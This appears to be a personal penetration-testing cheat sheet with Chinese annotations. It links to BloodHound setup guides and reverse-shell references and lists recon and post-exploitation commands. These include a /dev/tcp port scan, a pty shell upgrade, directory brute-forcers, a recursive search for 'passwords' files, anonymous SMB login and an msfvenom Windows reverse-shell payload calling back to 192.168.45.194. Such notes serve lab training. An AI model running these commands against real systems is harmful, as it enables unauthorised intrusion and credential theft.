寫作之難，在於把網狀的思考，用樹狀結構，展現在線性展開的語句裡。

照這個裝一定跑的起來  https://blog.spookysec.net/Deploying-BHCE/ https://support.bloodhoundenterprise.io/hc/en-us/articles/17468450058267-Install-BloodHound-Community-Edition-with-Docker-Compose https://m4lwhere.medium.com/the-ultimate-guide-for-bloodhound-community-edition-bhce-80b574595acf

 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://hacktricks.boitatech.com.br/shells/shells/full-ttys Python3 python3 -c 'import pty; pty.spawn("/bin/sh")'

 Linux  for ip in {1..254}; do (ping -c 1 192.168.0.$ip | grep "bytes from" &); done for port in {1..1024}; do (echo > /dev/tcp/192.168.0.7/$port && echo $port open) 2> /dev/null; done

  HackTricks PayloadAllTheThings

1. Wfuzz  https://www.kali.org/tools/wfuzz/ 2. dirb 3. gobuster 4. feroxbuster --url http://192.168.192.188 5. Dirhunt

  Assembly Language Tutorial – EC-Council Store

 1 curl -O [URL] 2.powershell iwr 3.smbclient

從/開始，找一個檔名叫 passwords的檔案  find / - type f -iname "passwords" 2>/dev/null

msfvenom參數： msfvenom  -l payloads --platform php msfvenom -l payloads --platform windows --arch x64 msfvenom -p php/reverse_php --list-options Windows   msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.194 LPORT=4444 -f exe>reverse.exe

 1. 匿名登入： smbclient //192.168.192.10/floder -N